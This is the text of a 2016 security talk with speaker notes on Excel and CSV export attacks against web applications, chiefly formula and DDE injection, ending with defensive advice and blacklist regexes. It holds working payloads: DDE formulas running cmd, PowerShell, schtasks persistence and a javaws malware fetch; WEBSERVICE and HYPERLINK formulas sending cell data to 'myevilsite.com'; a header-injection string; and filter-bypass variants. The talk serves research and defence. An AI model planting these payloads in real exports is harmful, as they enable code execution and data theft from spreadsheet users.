This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos. Video at https://www.youtube.com/watch?v=3wNvxRCJLQQ.
CamSec Sept 2016 - Tricks to improve web app excel export attacks
1. Tricks to Improve Web App
Excel Export Attacks
Jerome Smith
CamSec September 2016
2. whoami
• In computer security for y years
• Pentester for p years
• At NCC Group for n years
• Where y 2p and p 2n and 2n + 5 y
• CREST CCT (App)
• Presented at BSides Manchester 2014 and 2016
• exploresecurity.com && @exploresecurity
2
3. By way of an agenda
1. Web application Excel export
2. What to look out for
3. The DDE trick
4. Can we improve the attack?
3
4. 4
Web application Excel export
• Users submit data to application
• Data is stored
• Elsewhere that data can be exported in Excel format
• CSV
• XLS
• XLSX
• User has at least some control over the contents
• Usually there’s a “template” with certain cells filled with user input
• That’s where things get interesting
• Wacky variations
• e.g. data to be exported was sent to client in a form and POSTed back!
6. 6
Some things to look out for
• Force format (more on this later)
f=xls → f=csv or app/export/xls/ → app/export/csv/
• Unauthenticated access
• Content-Type incorrect, esp. text/html → XSS?
• Unless Content-Disposition: attachment is present
• Header injection
f=csv"%0d%0aSet-Cookie:%20AUTH%3dABCDEF0123456789%0d%0aX:%20%22
Content-Disposition: attachment; filename="Year2016.csv"
Set-Cookie: AUTH=ABCDEF0123456789
X: ""
• Usefulness of Set-Cookie depends on other factors
• Cache-control directive
• Caching depends on content, context and browser
7. 7
The DDE trick
• Dynamic Data Exchange (DDE) is an old Microsoft technology
• Facilitates data transfer between applications
• A form of Inter-Process Communication (IPC)
• Security risks of Excel export first widely publicised 2014 by @albinowax
http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
• Consider a spreadsheet cell:
=cmd|'/c calc'!A0
service | topic ! item
• How about
• cmd /c <attacker_IPevil$malware.exe
• cmd /c net use <attacker_IP>c$
• An ISP should block outbound SMB ports
9. Users and warnings – Piranha
44% clicked through warnings
70% clicked through warnings
75% clicked through warnings
10. 10
Source of warnings
• Setting is a property of the file
• Only effective if file has been trusted previously
• Two stage attack (low and slow)?
• Benign payload =NotASheet!A1
• Malicious payload
11. 11
Trusted Documents
(1)
(2a)
Only the filename is stored
Downloads with static filenames are of interest
Once “trusted” if the file’s start-up prompt is set to auto-update,
only the third warning (CMD.EXE) is displayed
12. 12
Excel file format
XLSX vs XLS vs CSV
• Sometimes user can influence format, recall f=xls → f=csv
• CSV: no Protected View warning
• CSV: can’t contain start-up prompt auto-update setting
CSV format in XLS file
• Less likely outcome – one of those wacky variations!
• Format warning instead of Protected View warning
• Formal security warnings (1) and (2a) not shown
• Therefore file cannot be not “trusted” in the registry
• Curiously CSV format not supported: tab or CRLF cell delimiter
13. 13
That CMD.EXE warning
Built-in Excel functions
• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")
• Limited info about the system e.g. current directory
=INFO("DIRECTORY"), Excel version =INFO("RELEASE")
• =WEBSERVICE(URL)
• Sadly doesn’t support authentication (i.e. force NTLM authentication)
• Or file paths (local or UNC) or file://
• But it will steal data without user interaction (unlike HYPERLINK)
=WEBSERVICE("http://myevilsite.com/?data="&A1)
• =FILTERXML(XML, XPATH)
• Any XXE or parsing bugs?
14. 14
Alternatives to cmd.exe
• =powershell|'Test-Connection 127.0.0.1'!A0
Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula
=cmd|'/k powershell Test-Connection 127.0.0.1'!A0
• PATHEXT environment variable ignored – .exe only
• .exe files in PATH where filename <= 12 characters
=explorer|'https://nccgroup.trust'!A0
=schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0
=javaws|'http://myevilsite.com/malware.jnlp'!A0
=rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0
• N.B. if Excel is 32-bit, then the program will be run as such, etc.
16. 16
Native DDE services – 2/2
Progman
• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}
Folders (=Shell?)
• dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]}
What about in Excel?
• This could save you hours: when testing, if Excel hangs, try closing Tcl
• =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'
• That Tcl service-topic list isn’t complete…
17. 17
DDESpy
• Part of Visual Studio 6 (!)
• Must be running when application launches
18. 18
iexplore DDE
• =iexplore|WWW_OpenURL!exploresecurity.com
• No (3) “remote data not accessible” warning
• Slice of BeEF anyone?
• =iexplore|WWW_OpenURL!'<attacker_IP>c$'
• =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe'
• No better than where we were really!
• No obvious way to include switches anyway – a limitation of file://
20. 20
Demo
(1) No Protective View warning as CSV
(2) Just “Enable Content” warning as DDE call succeeded
• Background navigation to phishing site could be very effective
(3) No warnings – exactly which stars were aligned there?!
• A file with same name previously downloaded
• Had content to elicit warnings, which were accepted
• So it’s now “trusted”
• Previous file need not have been malicious – remember
=NotASheet!A1
• Malicious file’s start-up prompt set to auto-update links
21. 21
Bypassing filters
• Original article stated prefix cells starting with = with '
• This will “cast” the cell as text in XLS[X] and stop execution in CSV
• We know better now
• Imagine the blacklist ^=[A-Za-z].*
• How about:
+cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0
=cmd|'/k ipconfig'!A0
@SUM(cmd|'/k ipconfig'!A0)
"=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0
=(cmd|'/k ipconfig'!A0)
=0-cmd|'/k ipconfig'!A0
22. 22
Lessons
• Check out any Excel export that returns user-supplied data
• CSV is not a benign format
• DDE ≠ macro
• Input validation blacklists may not be robust
• Much of this stuff applies to red-teaming
• Excel documents as email attachments
• In some cases it may be possible to cut down the Excel warnings
• Excel may have more to give in this area
• The old stuff often comes back to bite us!
• Work in progress – do explore...
23. 23
Where now?
• Enumerate DDE surface area – services + topics + items
• Poorly documented
• iexplore c:WindowsSystem32ieframe.dll
• firefox c:Program Files (x86)Mozilla Firefoxxul.dll
• Progman/Shell/Folders c:WindowsSystem32shell32.dll
• Progman/Shell/Folders attractive as they’re always running
• But are they exploitable via Excel?
• dde execute Folders AppProperties {[ViewFolder("","c:windows",1)]}
• =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'
• =iexplore|WWW_OpenURL!'exploresecurity.com?a={[ViewFolder("","c:win
dows",1)]}' → http://www.exploresecurity.com/?a=ViewFolder
• =firefox|WWW_OpenURL!'http://exploresecurity.com?a={[ViewFolder("","
c:windows",1)]}' → http://exploresecurity.com/?a={[ViewFolder(
• =cmd|'/k echo {[ViewFolder("","c:windows",1)]}'!A0 →
{[ViewFolder("","c:windows",1)]}
25. 25
Defence
• Blacklists can be difficult to get right – this should not be a new lesson!
• Validation against a strict whitelist of “known good” should always be the go-
to defensive strategy
• Consider length, character types, format
• Otherwise e.g. for XLS[X] consider always prefixing user input with '
• This may break some numerical operations on those cells but if you’re
expecting a number then see above!
• Trouble with ' for CSV is that it’s visible
• If you have to use a blacklist, don’t be too strict
• In the vast majority of cases, “normal” input still won’t match, e.g. (and
I hate to do it but people have asked)
^W.+|.+!.+ // DDE
^W.+(.+) // formulae
Use at your own risk and they’ll probably change one day!
See next slide, but also…
HTTP
y param possibly reflected back – header and body
“Jerome” presumably manipulable (profile first name etc.)
Header disclosure
ASP.NET 4.0 unsupported
Format change – especially if using libraries, unintended functions supported
Incorrect content-type could yield XSS but spoiled by Content-Disposition
Cache-control
Report may include sensitive data
May not be cached due to other headers like Content-Disposition (without this Content-Type plays a role – in this case it would be cached due to text/html but application/vnd.ms-excel for .xls or application/vnd.openxmlformats-officedocument.spreadsheetml.sheet for xlsx less certain – browser-dependent)
Even apps that have good caching headers can fall down on file download (these requests not processed in same way, e.g. it’s a static file returned by server)
James Kettle, PortSwigger
DDE call
Cell reference is not required, could be anything (cells are used when data source is another Excel sheet)
Imagine program=shares topic=LSE item=NCC
It’s because the DDE call fails that Excel offers to run it
Orange/EE definitely blocks outbound 135 and 139 (and probably 25 and 445)
If internal app, those creds immediately valuable
(1) because it’s come from internet location
(2a) first encounter – creates registry entry to be “trusted”
(2b) when trusted but links not auto-updated
(3) because DDE call fails
More warnings may follow after payload launches
Piranha jobs where users had to accept Excel warning(s)
% of users who opened the spreadsheet
Clearly we didn’t know what the user experience was in terms of warnings but the fact there was a difference between opened spreadsheets and macros run shows that some further step must have been necessary
Internal Excel files often contain macros, especially within areas such as finance – users are habituated to the warnings
Or the warnings may have been disabled! This is the macro setting, doesn’t affect us here, but that’s worse!
Only once the Enable Content warning has been accepted does this setting make a difference
=NotASheet!A1 is enough to prompt Enable Content security warning but doesn’t do anything suspicious
Might as well hit them with once if they’re accepting the warning
Trust Center
https://support.office.com/en-gb/article/Block-or-unblock-external-content-in-Office-documents-10204ae0-0621-411f-b0d6-575b0847a795
Workbook Links = links to data in another workbook
https://support.microsoft.com/en-us/kb/826921
Part of Trust Center but not visible through the UI
Entry in registry doesn’t require users to save the file
Protected View approval registered immediately
Enable content approval registered once CMD warning answered (can be “no”)
Binary value?
Trusted Locations are default areas, nothing useful without prior access
Attack scenario: user input influences filename or application always names the file the same way
Browsers may be configured to auto-download in which case they will append numbers to stop accidental overwrite
If no filename in Content-Disposition then FF will name file by the page in the URI + an extension based on Content-Type e.g. export.asp.xls so this would produce same filename
Although CSV no PV, the EC warning means it can be trusted in registry
Invalid XLSX not tolerated
Excel 2010 vs 2013 no real difference
URI extension: doesn’t matter if request is for .xls or .asp etc
Content-Type / Content-Disposition filename dominant
But text/csv not recognised so only if URI is .csv will it be opened correctly, otherwise .asp will fail
Document opened inline vs saved & opened from disk
If inline, URI must end CSV, otherwise similar to above
Invalid XLS format
=cmd|'/k ipconfig'!A3 okay
1 2 3 =cmd|'/k ipconfig'!A3 okay
1
2
3
=cmd|'/k ipconfig'!A3 okay
1,2,3,=cmd|'/k ipconfig'!A3 not okay
Can we get rid of or soften that CMD.EXE warning?
Tried =powershell in Excel 2010 (32-bit), 2013 (32-bit), 2016 (64-bit)
@ZephrFish doesn’t see this (!?) but if it can happen then it’s still something to wary of
Tilde means next character is a literal e.g. in Find, but can’t be escaped in formula with ~~ or \~ etc ???
Not many files have 8.3 alternative anyway
Find files < 8 chars plus .exe by powershell "cmd /c dir *.exe /b |? {$_.length -lt 13}"
explorer will open default browser
Java Web Start – may be disabled anyway but fun!
Data theft from sheet a little alarming, although something malicious would already have to be running
You can overwrite cells of the spreadsheet that you can’t using the web app injection
Use of Alert vs MsgBox -> XLM macro language in Excel 4.0 before VBA (old help file in reference at end)
Alert also demonstrates multiple statements i.e. [macro 1][macro 2]
Exec didn’t work or fopen
The System topic seems to do same as Sheet but unexplored
Documentation on DDE interfaces poor – Googling so much, Google thought I was a robot!
Progman manipulates shortcuts in Start | All Programs
Screenshot of typing “word” into Start search menu
Can’t delete real Microsoft Word 2010 as link is in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office”
Folders instructs Windows Explorer (Shell seems to mirror Folders)
The “2” minimises the window
Doesn’t accept URL
Clear out DDE channels from Excel
https://social.technet.microsoft.com/Forums/office/en-US/7c8f845d-c4aa-4627-9008-3251d2772536/dde-links-crash-excel-2010-on-windows-7-64bits?forum=excel
Dim i, ChannelNumber As Integer
For i = 1 To 1000 Application.DDETerminate (i)
Next i
Only works if IE running
Trailing / after domain important
Note that only URL of active tab obtained
WWW_GetWindowInfo doesn’t work in IE
Another reason to keep session tokens etc. out of URLs
Top left picked up – others pass
The @ was originally an alias for = to make life easy for converts from Lotus Notes
SUM could also be COUNT, COS…
Some may only work when in file and opened, not copy & paste, as Excel corrects syntax to make it work!
If something in Tcl doesn’t work in Excel, useless
Syntax of DDE not needed elsewhere?
Is it Excel limitation?...
iexplore/firefox tests
iexplore only chars associated with URLs like : / ? . % passed through (suggests IE filtering DDE input)
Confirmed by difference with Firefox
cmd test everything came through
But that’s not a “real” DDE call
Also special characters in topic here, cf item in iexplore – difference (you’d think item would be more open)?
Image from https://images.template.net/wp-content/uploads/2014/10/Free-brick-wall-texture.jpg
All available textures for free download come under the ambit of Creative Commons Usage
Based on http://www.texturemate.com/content/free-texture-brick-25-05-2014-00005-img0871
Every resource provided on texturemate is considered completely royalty free! The stock textures, texture packs, brush packs, and any other resources available for download on this site are completely free and may be used in commercial or non-commercial applications. Credit to texturemate for use of available textures or brushes is appreciated, but not required
Consider phone number – it may have a + at the front but so structured elsewhere that it can be well protected
Prefixing with ' may break some numerical operations on that cell e.g. SUM but if you’re expecting a number then use whitelist; text functions should still work
Blacklist regex – you asked for it!
Regexes could be combined but harder to match literals | only with ! and ( only with ) – nothing wrong with clarity!
\W (capital) matches non-alphanumeric
Formulae is probably more prone to false positives